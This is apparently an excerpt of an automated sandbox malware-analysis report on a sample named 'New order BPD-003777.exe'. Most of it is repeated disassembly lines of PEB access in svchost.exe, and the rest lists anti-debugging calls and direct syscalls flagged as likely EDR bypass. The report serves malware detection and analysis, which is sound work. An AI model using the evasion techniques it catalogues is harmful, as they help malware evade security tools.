Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]	1_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]	1_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]	1_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]	1_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]	1_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]	1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]	1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]	1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]	1_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]	1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]	1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]	1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]	1_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]	1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]	1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]	1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]	1_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]	1_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]	1_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]	1_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]	1_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]	1_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]	1_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]	1_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]	1_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]	1_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]	1_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304B00 mov eax, dword ptr fs:[00000030h]	1_2_03304B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]	1_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]	1_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]	1_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]	1_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]	1_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]	1_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]	1_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228B50 mov eax, dword ptr fs:[00000030h]	1_2_03228B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]	1_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]	1_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]	1_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]	1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]	1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]	1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]	1_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]	1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]	1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]	1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]	1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]	1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]	1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]	1_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]	1_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]	1_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]	1_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]	1_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]	1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]	1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]	1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]	1_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]	1_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]	1_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]	1_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]	1_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]	1_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]	1_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]	1_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]	1_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]	1_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]	1_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]	1_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]	1_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]	1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]	1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]	1_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]	1_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]	1_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]	1_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]	1_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]	1_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]	1_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]	1_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]	1_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]	1_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]	1_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]	1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]	1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]	1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]	1_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]	1_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]	1_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]	1_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304940 mov eax, dword ptr fs:[00000030h]	1_2_03304940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]	1_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]	1_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]	1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]	1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]	1_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]	1_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]	1_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]	1_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]	1_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]	1_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]	1_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]	1_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]	1_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]	1_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]	1_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]	1_2_032BE872

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002B2622
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002A083F
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A09D5 SetUnhandledExceptionFilter,	0_2_002A09D5
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_002A0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
